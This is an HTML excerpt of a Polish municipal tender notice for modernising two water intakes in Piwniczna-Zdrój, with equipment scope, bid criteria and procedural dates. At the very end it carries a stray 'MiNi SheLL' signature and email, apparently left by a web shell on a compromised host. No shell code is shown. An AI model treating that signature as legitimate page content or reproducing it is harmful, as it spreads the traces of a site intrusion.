<span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres rękojmi i gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Cześć 5<br/>Budowa infrastruktury turystycznej, modernizacja sieci wod -kan oraz dróg wraz z cyfryzacją usług w gminie Piwniczna -Zdrój - Modernizacja 2 ujęć wody<br/><br/><br/>Określenie przedmiotu zamówienia<br/>3.Przedmiotem zamówienia jest; Budowa infrastruktury turystycznej, modernizacja sieci wod-kan oraz dróg wraz z cyfryzacją usług w gminie Piwniczna -Zdrój cześć 5- Modernizacja 2 ujęć wody<br/>Zakres robót obejmuje: Modernizacja 2 ujęć wody<br/>3.I Opis przedmiotu zamówienia.<br/>Przedmiotem zamówienia jest modernizacja dwóch ujęć wody:<br/>-	ujęcia wody w Piwnicznej-Zdroju (Łaski) w zakresie dostawy montażu i uruchomie-nia chloratora, oraz zamontowania na rurociągu odpływowym przepustnicy z napę-dem elektrycznym, oraz przepływomierza elektromagnetycznego.<br/>-	ujęcia wody w Łomnicy-Zdrój w zakresie dostawy montażu i uruchomienia chlorato-ra. <br/>1.1. Opis stanu istniejącego na ujęciu wody Piwniczna-Zdrój (Łaski).<br/>Gmina posiada obecnie obowiązujące Pozwolenie Wodnoprawne na pobór wód pod-ziemnych ze źródeł 1, 2, 3 w ilości Qśr,d=130,25m3/h, Qmax,h=14,97m3/h, Qmax,r=47 543,00m3/h. <br/>Woda ze studni kopanych pobierana jest na zasadzie samo-wypływu, trzema rurocią-gami o średnicy: studnie nr 1 i 2 - DN50mm, studnia nr 3 – DN80mm, następnie rurocią-giem zbiorczym ze studni 1 i 2 o średnicy DN50mm i ze studni nr 3 DN80 woda jest dopro-wadzana do studni zbiorczej, skąd rurociągiem o średnicy DN100 grawitacyjnie płynie do zbiornika wyrównawczego („Łaski góra”), zbudowanego z dwóch komór, każda po 50 m3. <br/>Pomiar pobieranej ze środowiska wody, odbywa się za pomocą wodomierza, zainsta-lowanego w studzience wodomierzowej przed zbiornikiem wyrównawczym. Woda ze źródeł napływa do zbiornika wyrównawczego w sposób ciągły, a nadmiar jej jest odprowadzany przelewem (nr 2) do odbiornika tj. cieku „bez nazwy”. Ze zbiornika przewodem DN100 wo-da w ilości ok. 50m3/h doprowadzana jest do osiedla „bloki”, natomiast przewodem DN150 do kolejnego zbiornika „Łaski dół” o pojemności 100 m3 i w ilości max. ok. 200 m3/d do odbiorców. Nadmiar wody ze zbiornika „Łaski dół” odprowadzany jest również do potoku „bez nazwy”. W budynku SUW (przy zbiorniku „Łaski dół”), na rurociągu wody kierowanej do odbiorców (DN100) zainstalowana jest lampa UV Probico Protec 1400, 19 m3/h, 100-120 m3/d.<br/>Podchloryn sodu dawkowany jest okresowo, punktowo – bezpośrednio do zbiorników wy-równawczych „Łaski góra” „Łaski dół”.<br/>1.1.1 Wymagania techniczne dla zestawu do dozowania roztworu podchlorynu sodu na ujęciu wody Piwniczna-Zdrój (Łaski) <br/>Modernizacja ujęcia wody Piwniczna-Zdrój (Łaski) obejmuje następujące elementy:<br/>-	dostawa, montaż i uruchomienie kompletnego chloratora -1 kpl.<br/>-	dostawa, montaż i uruchomienie kompletnej lampy bakteriobójczej do wody UV - 1 kpl.<br/>-	dostosowanie rurociągu doprowadzającego wodę do zbiornika wyrównawczego &#34;Ła-ski góra&#34; w celu montaż przepływomierza elektromagnetycznego DN100 - 1 szt. oraz montażu przepustnicy z napędem elektrycznym DN100 – 1 szt.<br/>-	zabudowa wyłączników pływakowych do sygnalizacji poziomu w zbiornikach wy-równawczych &#34;Łaski góra&#34; i &#34;Łaski dół&#34;.<br/>-	dostawa i uruchomienie systemu telemetrii do przekazywania poziomu pomiędzy zbiornikami &#34;Łaski góra&#34; i &#34;Łaski dół&#34;<br/>-	Rozbudowa istniejącej stacji SCADA zlokalizowanej na dyspozytorni oczyszczalni ścieków w Piwnicznej-Zdroju przy ul. Krakowskiej 26 w celu wizualizacji ujęcia wody.<br/>Zamawiający informuje, że z uwagi na ograniczenia techniczne w zakresie ilości użytych znaków, opis przedmiotu<br/>zamówienia zawarta jest w SWZ<br/>1.3. Opis stanu istniejącego na ujęciu wody Łomnica-Zdrój<br/>Gmina posiada obecnie obowiązujące Pozwolenie Wodnoprawne na pobór wód pod-ziemnych ze źródeł 4-7, w ilości Qśr,d=301,40m3/h, Qśr,h=14,97m3/h, Qmax,r=110 011,0040m3/h. <br/>Woda z 4 studni pobierana jest na zasadzie samo-wypływu, czterema rurociągami o średnicy DN50mm, następnie rurociągiem zbiorczym o średnicy DN80mm, który doprowa-dza wodę do studni zbiorczej zbudowanej z kręgów betonowych DN800mm. Woda ze źródeł napływa do studni zbiorczej w sposób ciągły, a nadmiar jej jest odprowadzany przelewem (nr 1) do odbiornika tj. potoku Łomniczanka. Woda zgromadzona w studni zbiorczej dopro-wadzana jest grawitacyjnie rurociągiem o średnicy DN108mm do zbiornika wyrównawczego o objętości 100m3, z którego siecią wodociągową o średnicy DN250mm przesyłana jest do odbiorców. Aktualne zapotrzebowanie na wodę wynosi ok. 300 m3/d. Pomiar pobieranej ze środowiska wody odbywa się przy zastosowaniu wodomierza, zainstalowanego w studzience wodomierzowej za zbiornikiem wyrównawczym. Podchloryn sodu dawkowany jest okreso-wo, punktowo – bezpośrednio do zbiornika wyrównawczego.<br/>1.4. Opis modernizacji ujęcia wody Łomnica-Zdrój<br/>	Należy wymienić wyeksploatowany istniejący chlorator na nowy zestaw do dozowa-nia roztworu podchlorynu sodu wg specyfikacji w p.1.5. Zestaw należy zainstalować w ist-niejącym budynku technicznym w miejsce starego, a punkt dawkowania bez zmian do zbior-nika wyrównawczego. Instalacje dozowania podchlorynu sodu należy wykonać z rur PVC chemoodpornych o średnicy DN15 lub DN20, połączenia klejone. Regulacja dawki podchlo-rynu w sposób ręczny z panelu operatorskiego pompy dozującej. Pompa dozująca musi mieć możliwość sterowania wydajnością za pomocą wejścia impulsowego, lub pętli prądowej w celu przyszłej rozbudowy systemu dozowania w powiązaniu z pomiarem przepływu<br/>Zamówienie realizowane jest w ramach dofinansowania Inwestycji z Programu Rządowego Funduszu Polski Ład: Program<br/>Inwestycji Strategicznych zgodnie z Wytycznymi zawartymi w przedmiotowym Programie, Wykonawcę obowiązują zapisy<br/>obowiązujące w przedmiotowym programie.<br/>Zamawiający informuje, że z uwagi na ograniczenia techniczne w zakresie ilości użytych znaków, opis przedmiotu<br/>zamówienia zawarta jest w SWZ<br/>3.11. Wspólny Słownik Zamówień: <br/><br/>45332200-5 - Roboty instalacyjne hydrauliczne<br/>42912330-4 - Aparatura do oczyszczania wody </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">42912330-4 - Aparatura do oczyszczania wody</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45332200-5 - Roboty instalacyjne hydrauliczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">16 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Sposób oceny ofert: Zamawiający w procedurze badania i oceny ofert w pierwszej kolejności dokona rozstrzygnięcia, które oferty podlegają odrzuceniu w oparciu o okoliczności wskazane w art.226 ustawy pzp. Dokona także procedury poprawy omyłek oraz weryfikacji ofert pod kątem „rażąco<br/>niskiej ceny”.<br/>Ocenie punktowej będą podlegały oferty nie podlegające odrzuceniu. Dane do wskazanych poniżej wzorów w procesie oceny na podstawie kryteriów będą wprowadzane z ofert nie podlegających odrzuceniu. Zamawiający wybiera najkorzystniejszą ofertę na podstawie kryteriów oceny ofert.<br/>Kryteria i sposób oceny oferty:<br/>- cena - Maksymalna ilość punktów w kryterium - 60.<br/>Kryterium – „Cena” będzie oceniane na podstawie ceny brutto przedmiotu zamówienia zawartej w ofercie, a ilość punktów obliczana będzie według poniższego wzoru:C = WP x Cnaj/cof<br/>– okres rękojmi - Maksymalna ilość punktów w kryterium - 40<br/>1) okres rękojmi liczony jest w miesiącach;2) minimalny okres rękojmi wynosi 24 miesięcy - w przypadku zaoferowania przez Wykonawcę okresu<br/>rękojmi krótszego niż 24 miesięcy Zamawiający ofertę odrzuci. W przypadku, gdy Wykonawca w ogóle nie wskaże w ofercie oferowanego okresu rękojmi zamawiający przyjmie, że Wykonawca nie oferuje<br/>rękojmi i ofertę odrzuci;<br/>3) maksymalny okres rękojmi wynosi 36 miesiące - wskazany w formularzu ofertowym okres rękojmi<br/>powyżej 36 miesięcy liczony będzie jako okres rękojmi 36 miesiące;<br/>4) Wykonawcy oferują długość okresu rękojmi w pełnych miesiącach;<br/>5) ocena punktowa oferty w tym kryterium zostanie przeprowadzona zgodnie z następującą formułą:<br/>R = ( ((Robliczana-Rmin))/((Rmax-Rmin) ) ) x Wmax</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres rękojmi i gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia braku<br/>podstaw wykluczenia Wykonawcy z udziału w postępowaniu o udzielenie<br/>zamówienia publicznego, Zamawiający na podstawie §3 Rozporządzenia , będzie żądał dostarczenia:<br/>Oświadczenia Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy, w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 7.1. Formularz ofertowy (załącznik nr 1.1 do SWZ do: Części 3, Części.5, )<br/>7.2. Oświadczenie, o którym mowa w pkt. 6 SWZ (załącznik nr 2 do SWZ). <br/>7.3. Pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia - dotyczy ofert składanych przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia. <br/>7.4. Pełnomocnictwo* dla osoby/osób podpisującej ofertę i oświadczenia (w sytuacji, gdy ofertę podpisuje osoba, której prawo do reprezentowania Wykonawcy nie wynika z dokumentów załączo-nych do oferty). <br/>*Pełnomocnictwo należy złożyć w formie oryginału lub notarialnie poświadczonej kopii w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie o<br/>którym mowa w pkt. 6 SWZ – w art. 125 ust. 1 ustawy, składane zgodnie z załącznikiem nr 2 SWZ, składa każdy z Wykonawców <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Wszelkie zmiany i uzupełnienia treści umowy winny zostać dokonane wyłącznie w formie aneksu podpisanego przez obie strony, pod rygorem nieważności, zgodnie z art. 455 PZP.<br/>2. W związku z brzmieniem art. 455 ust. 1 pkt 1 PZP, Zamawiający przewiduje następujące możliwości dokonania zmiany niniejszej umowy: Zamawiający przewiduje zmiany umowy. Z uwagi na ograniczenia techniczne w zakresie ilości użytych znaków.Zamawiający informuje, iż projekt umowy, w tym ewentualne treści zmian do umowy określone są w załącznik 3 do SWZ do Części.3, Części.5, <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-05-12 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://piwniczna.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-05-12 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-06-10</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Szczegółowy opis przedmiotu zamówienia oraz warunków jego wykonania znajduje się w SWZ oraz załącznikach stanowiących jej integralną część. Zamawiający informuje, że z uwagi na ograniczenia techniczne w zakresie ilości użytych znaków wszystkie informacje związane z prowadzonym postępowaniem zawarte są w SWZ Zamówienie realizowane jest dofinansowania Inwestycji z Programu Rządowego Funduszu Polski Ład: Program Inwestycji Strategicznych zgodnie z Wytycznymi zawartymi w przedmiotowym Programie, Wykonawcę obowiązują zapisy obowiązujące w przedmiotowym programie.

Creat By MiNi SheLL
Email: jattceo@gmail.com